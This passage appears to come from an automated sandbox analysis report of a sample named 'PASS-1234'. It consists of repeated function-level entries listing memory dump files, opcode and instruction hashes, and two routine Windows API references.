          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D3F34D
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: FeaturePresentProcessor
          • String ID:
          • API String ID: 2325560087-0
          • Opcode ID: 390d722b4b852cf99322885c4ce548d07c4158e7945bd8a39d62103f4cd7618b
          • Instruction ID: e8fc248a16d27ee5c65022a901456f125bc78634292ff5f05b7dd4053072a488
          • Opcode Fuzzy Hash: 390d722b4b852cf99322885c4ce548d07c4158e7945bd8a39d62103f4cd7618b
          • Instruction Fuzzy Hash: 8F516DB1D002199FDB25CF56D885BAABBF0FB48314F28853AD405EB294D3749905CF60
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 3544bc00ed84951af7681316341d13ffcd7b48d6d1d732a792e74be87f59a4b0
          • Instruction ID: 9380084a4c3641749b5843e87ca50de67047475966bc436a8b4760d5eb491adb
          • Opcode Fuzzy Hash: 3544bc00ed84951af7681316341d13ffcd7b48d6d1d732a792e74be87f59a4b0
          • Instruction Fuzzy Hash: 5EE18E706086058FCB28CF68C584AAEB7B1FF45314B288E5DD49E9B291E730ED46CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: ec4157d041430be44bb3a945d8b83ba9650f4edc53e3b780cb01be9598bc5d95
          • Instruction ID: df6e180b6ada8cabe28dc0a69b595419f82e541d7e41093273f3bdae6f3df446
          • Opcode Fuzzy Hash: ec4157d041430be44bb3a945d8b83ba9650f4edc53e3b780cb01be9598bc5d95
          • Instruction Fuzzy Hash: 69E1AF70604A058FCB24CF28C580AAAB7F1FF45314B68CA5DE99A9B291F731ED41CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: bb1f11315ee19d1d65ab88752c40f35ed7958ea65b7b78bcfe8a36b968111451
          • Instruction ID: 2d6e88bb9a1d28b64b6d93a703ccd6d706fd9314e80cb83055b94e60ccacef13
          • Opcode Fuzzy Hash: bb1f11315ee19d1d65ab88752c40f35ed7958ea65b7b78bcfe8a36b968111451
          • Instruction Fuzzy Hash: C5E17B706086058FCB25CF28C590ABEB7B2FF48314B288E59D59E9B291E730ED45CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: b2a3bd3951cbd23bfdcca9ae55fd72ad230e31a3817814e74c3ec2a0eb9bd233
          • Instruction ID: 0c2f56f2608209aa1d448c2a579a1a7a5d8277389c0ab425340a411244ca8da4
          • Opcode Fuzzy Hash: b2a3bd3951cbd23bfdcca9ae55fd72ad230e31a3817814e74c3ec2a0eb9bd233
          • Instruction Fuzzy Hash: E5C1B170900B468FCB25CF28E48177AB7B1AB45310F28861DD58E9B299E7B1ED45CB72
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 826708fc3c0aac64fa14c8606b929e027f2246e15dbcd7c7dcc5d02ad44b7907
          • Instruction ID: d97927b9c3cbddcc7666c1b8af21b9ba98709f62a7c3feefb103af8faa246875
          • Opcode Fuzzy Hash: 826708fc3c0aac64fa14c8606b929e027f2246e15dbcd7c7dcc5d02ad44b7907
          • Instruction Fuzzy Hash: 58C1F370900A468FCB28CF18E48067EBBB2EF05304F58861DD49E9B295E7B0ED45CB72
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: f49394e7a0eb1e39acc894b39c3d7e8beb44d42a4dcb0f64e43b7dd0efa49984
          • Instruction ID: c6f03791be996f842b7e549f4663f9ace113cd63e051551e396ec24ba26a0b0f
          • Opcode Fuzzy Hash: f49394e7a0eb1e39acc894b39c3d7e8beb44d42a4dcb0f64e43b7dd0efa49984
          • Instruction Fuzzy Hash: CFC1AF70A00E468FCB24CE68D49467ABBA1EF05310B18861DE49A9B295F7B1ED45CB72
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D9B8D3
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID:
          • API String ID: 2299586839-0
          • Opcode ID: edc83ae7349b7d580fcdbbf1097c6c782e88abe2b791f1802577a50924ce790a
          • Instruction ID: 35feedb175aa804482485d28b192e661f3b03b696467e54159ea3e807d99fa98
          • Opcode Fuzzy Hash: edc83ae7349b7d580fcdbbf1097c6c782e88abe2b791f1802577a50924ce790a
          • Instruction Fuzzy Hash: A621B371625216BBDF289F29ED45B7A73ACEF44324B15007AFA06D6181EB34ED018B70
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 48b2977bf63b1b8cfdf129c94eafeddb01efc9fd9fcc52ef45a002d1c56bcf00
          • Instruction ID: 80e970a5b871eaae515b45027ed559c24329b09a91f0174a500b70edef5365db
          • Opcode Fuzzy Hash: 48b2977bf63b1b8cfdf129c94eafeddb01efc9fd9fcc52ef45a002d1c56bcf00
          • Instruction Fuzzy Hash: 41B1BE70A00A0A8BCF28CF68C581ABEB7B5EF44704B58851DD59EA7690F731ED46CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: WPQR
          • API String ID: 0-1038588538
          • Opcode ID: ca505c570ba1984262176c04f1f304d4860d080007251fab15cfc689af1e121f
          • Instruction ID: ed251fbf05d19e19a4ea8b470d4626c2006566cd87c3c461be00c9b9a9a9713a
          • Opcode Fuzzy Hash: ca505c570ba1984262176c04f1f304d4860d080007251fab15cfc689af1e121f
          • Instruction Fuzzy Hash: F791F2B16042418BDB24EF25CC91B7BB7E1EF85320F09462CF89697281E7B4E955C7B1
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 876ebbb8475af4cc810b7bce7f90213a82318b92dcdf955c284ab23c3d18ab13
          • Instruction ID: 34de4097cfabdf91214d823a41eeed10ab0975e352a335c7533297277697cce5
          • Opcode Fuzzy Hash: 876ebbb8475af4cc810b7bce7f90213a82318b92dcdf955c284ab23c3d18ab13
          • Instruction Fuzzy Hash: 13B19E70A00B0A9ACB24CFA8C581ABEB7F1EF44704B58851DE45EA7691F670ED46CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: 2cb3c63cef3877a1533659b02bb76024e7350aa09c2112527a09e7b5180712b1
          • Instruction ID: 8b30f397f675e72d4985c69cfb51600407edaf9b5d746a971388cb44e5c303c0
          • Opcode Fuzzy Hash: 2cb3c63cef3877a1533659b02bb76024e7350aa09c2112527a09e7b5180712b1
          • Instruction Fuzzy Hash: A7B19E74A00A098ECB24CF69C991ABEBBF5EF45700B18851DD49EE7690F630ED46CB71
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ad7d2c018e39fbf13e159b7b1ae8453a8b54332fa059a63012676ec79bf772cd
          • Instruction ID: fa7aad122a78e1d977c92a1904fdc7ece9ccf1de4da7338fa8bff6a20ffeb642
          • Opcode Fuzzy Hash: ad7d2c018e39fbf13e159b7b1ae8453a8b54332fa059a63012676ec79bf772cd
          • Instruction Fuzzy Hash: A372A278E002069FCF18EF68C891ABEB7B9EF45304F19416DDD4697345D631AE4ACBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 0
          • API String ID: 0-4108050209
          • Opcode ID: c5e67f27f58e807668fd41bfba33286d7bc35931b8042762a1107de513bd5d1b
          • Instruction ID: 6728e4b14dc3783fb3377130e8f4532f34b67a10e4d0db7e4ffd8bc2d76cc2f9
          • Opcode Fuzzy Hash: c5e67f27f58e807668fd41bfba33286d7bc35931b8042762a1107de513bd5d1b
          • Instruction Fuzzy Hash: 8DB1D570A0060A8BCB36CE68C4556BEB7B5FF41314F18851EE49AD7291E734DA41CB75
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
